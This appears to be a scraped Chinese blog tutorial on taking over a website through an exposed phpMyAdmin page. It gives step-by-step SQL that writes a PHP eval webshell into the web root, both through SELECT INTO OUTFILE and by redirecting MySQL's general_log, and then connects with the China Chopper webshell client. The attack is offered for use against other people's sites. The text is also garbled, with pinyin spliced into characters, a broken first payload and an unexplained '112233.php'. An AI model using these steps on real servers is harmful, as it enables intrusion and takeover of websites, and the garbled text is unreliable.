phpmyadmin中g(shù)etshell有什么用

這篇文章主要介紹了phpmyadmin中g(shù)etshell有什么用，具有一定借鑒價(jià)值，感興趣的朋友可以參考下，希望大家閱讀完這篇文章之后大有收獲，下面讓小編帶著大家一起了解一下。

phpMyAdmin 是一個(gè)以PHP為基礎(chǔ)，以Web-Base方式架構(gòu)在網(wǎng)站主機(jī)上的MySQL的數(shù)據(jù)庫(kù)管理工具，讓管理者可用Web接口管理MySQL數(shù)據(jù)庫(kù)。借由此Web接口可以成為一個(gè)簡(jiǎn)易方式輸入繁雜SQL語(yǔ)法的較佳途徑，尤其要處理大量資料的匯入及匯出更為方便。其中一個(gè)更大的優(yōu)勢(shì)在于由于phpMyAdmin跟其他PHP程式一樣在網(wǎng)頁(yè)服務(wù)器上執(zhí)行，但是您可以在任何地方使用這些程式產(chǎn)生的HTML頁(yè)面，也就是于遠(yuǎn)端管理MySQL數(shù)據(jù)庫(kù)，方便的建立、修改、刪除數(shù)據(jù)庫(kù)及資料表。也可借由phpMyAdmin建立常用的php語(yǔ)法，方便編寫(xiě)網(wǎng)頁(yè)時(shí)所需要的sql語(yǔ)法正確性。

通俗的講 其作用就是可以在web頁(yè)面方便的操作數(shù)據(jù)庫(kù)。

當(dāng)我們得到一個(gè)站點(diǎn)的phpmyadmin頁(yè)面時(shí)，下一步要做的就是getshell。

可以通過(guò)寫(xiě)shell進(jìn)行提權(quán)，而我們需要滿足以下條件：

1.數(shù)據(jù)庫(kù)root權(quán)限

2.知道網(wǎng)站的物理路徑

3.數(shù)據(jù)庫(kù)有寫(xiě)權(quán)限

通過(guò)  select '<?php eval($_POST=[123];)?>' INTO OUTFILE '網(wǎng)站物理路徑' 寫(xiě)入shell

本文主要講的是在條件3不滿足的情況下成功getshell。

利用條件：MySQL 5.0+

MySQL 5.0+的版本會(huì)自動(dòng)創(chuàng)建日志文件，那么在服務(wù)運(yùn)行的情況下修改全局變量也是可以變動(dòng)文件位置的，但是必須要對(duì)生成日志的目錄有可讀可寫(xiě)的權(quán)限。

（Linux環(huán)境下可能會(huì)比較苛刻，因?yàn)檎军c(diǎn)目錄是一個(gè)用戶，MySQL是另外一個(gè)用戶，權(quán)限管控較為嚴(yán)格，主要取決于權(quán)限配置是否得當(dāng)）

首先我們測(cè)試站點(diǎn)是否有寫(xiě)權(quán)限

執(zhí)行sql語(yǔ)句               SHOW VARIABLES LIKE 'secure_file_priv'

sql語(yǔ)句 SHOW VARIABLES LIKE 'secure_file_priv'  進(jìn)行查詢 查找secure_file_priv

secure-file-priv特性
secure-file-priv參數(shù)是用來(lái)限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()傳到哪個(gè)指定目錄的。

• 當(dāng)secure_file_priv的值為null ，表示限制mysql 不允許導(dǎo)入|導(dǎo)出

• 當(dāng)secure_file_priv的值為/tmp/ ，表示限制mysql 的導(dǎo)入|導(dǎo)出只能發(fā)生在/tmp/目錄下

• 當(dāng)secure_file_priv的值沒(méi)有具體值時(shí)，表示不對(duì)mysql 的導(dǎo)入|導(dǎo)出做限制

可以在mysql-ini文件中設(shè)置其屬性

經(jīng)測(cè)試，我們沒(méi)有寫(xiě)權(quán)限

然后再介紹兩個(gè)MySQL全局變量（general_log、general_log file）

1. general log 指的是日志保存狀態(tài)，一共有兩個(gè)值（ON/OFF）ON代表開(kāi)啟 OFF代表關(guān)閉。

2. general log file 指的是日志的保存路徑。

我們可以通過(guò)將一句話木馬寫(xiě)入mysql日志中然后移動(dòng)mysql日志路徑到網(wǎng)站目錄下實(shí)現(xiàn)getshell

執(zhí)行sql語(yǔ)句   SHOW VARIABLES LIKE 'general_log%'  進(jìn)行模糊查詢

日志默認(rèn)關(guān)閉

我們執(zhí)行sql語(yǔ)句

set global general_log = "ON";     #開(kāi)啟日志
SET global general_log_file='網(wǎng)站下物理路徑';  #更換日志路徑

成功創(chuàng)建

然后執(zhí)行特殊的查詢語(yǔ)句

select  '<?php eval($_POST[aaa]);?>'

我們進(jìn)入112233.php進(jìn)行驗(yàn)證，成功寫(xiě)入shell

最后進(jìn)行菜刀連接，獲得站點(diǎn)webshell

感謝你能夠認(rèn)真閱讀完這篇文章，希望小編分享的“phpmyadmin中g(shù)etshell有什么用”這篇文章對(duì)大家有幫助，同時(shí)也希望大家多多支持億速云，關(guān)注億速云行業(yè)資訊頻道，更多相關(guān)知識(shí)等著你來(lái)學(xué)習(xí)!